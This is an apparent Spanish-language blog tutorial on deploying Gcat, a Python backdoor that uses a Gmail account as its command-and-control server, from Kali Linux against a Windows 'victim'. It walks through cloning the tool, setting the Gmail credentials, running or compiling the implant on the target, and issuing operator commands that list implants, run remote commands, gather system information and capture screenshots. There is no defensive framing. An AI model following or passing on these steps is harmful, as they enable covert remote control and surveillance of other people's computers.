Un backdoor escrito en Python que utiliza Gmail desde Kali Linux (Gcat)–CatBad

Estaba leyendo los repositorios de un persona que jugaba con backdoor y me llamo la atención el nombre de uno de esas repo, admito que ya lo había escuchado pero no probado entonces decidí hacerlo y ejecutarlo desde Kali Linux al cual usaremos el atacante un windows.

Precisamos de Python en ambas, sea victima como atacante.

Veamos el significado de Gcat

¿Qué es Gcat?

Gcat es un backdoor escrito en Python que utiliza Gmail como servidor de comando y control (C&C). Para hacerlo funcionar primero necesitarás una cuenta de Gmail dedicada (¡no uses la tuya personal!) y activar “permitir aplicaciones menos seguras en la configuración de la misma.

La repo lo encontrarás aquí.
La ubicamos para mejor comodidad.

 git clone https://github.com/byt3bl33d3r/gcat.git
 cd gcat
 chmod +x gcat.py

ATENTOS! EDITAMOS LO SIGUIENTE…. (IMPORTANTE)

 

Screenshot from 2016-04-29 13-04-12

En ambos archivos, edita las variables gmail_user y gmail_pwd con el nombre de usuario y la contraseña correspondientes. Probablemente también querrás compilar implant.py en un archivo ejecutable utilizando PyInstaller.

Editamos el correo y la contraseña, osea la cuenta que vamos a usar.  Y antes de eso activa la cuenta menos segura Aquí, como mencione anteriormente.

Screenshot from 2016-04-29 13-07-43

También lo hacemos con la victima.

Screenshot from 2016-04-29 13-10-00 Screenshot from 2016-04-29 13-10-25Después de haber editado los mismos archivos vamos ejecutarlo por “CMD”. Recuerda que tienes que buscarlo por CMD en mi caso están en Downloads

Screenshot from 2016-04-29 13-12-59

Ahora solo vamos ejcutar el archivo “implant.py” en mi caso solo corre “implant.py” en otros caso es “python implant.py”

Screenshot from 2016-04-29 13-16-24

Ahora vamos con Kali linux en el cual vamos a obtener mucha información que nos llegara a nuestro correo y también por la terminal.

Screenshot from 2016-04-29 13-18-12

 python gcat.py -list
 python gcat.py -id f2354db3-8611-5d21-b9a2-7246adad9a1e

Recuerda que la ID cambia según la cuenta.

 gcat.py -id f2354db3-8611-5d21-b9a2-7246adad9a1e -cmd 'ipconfig'
 python gcat.py -id f2354db3-8611-5d21-b9a2-7246adad9a1e -jobid xxxxxx
 python gcat.py -id f2354db3-8611-5d21-b9a2-7246adad9a1e -info

capturar pantalla

 python gcat.py -id f2354db3-8611-5d21-b9a2-7246adad9a1e -screenshot
 python gcat.py -id f2354db3-8611-5d21-b9a2-7246adad9a1e -jobid xxxxxx

Screenshot from 2016-04-29 13-25-01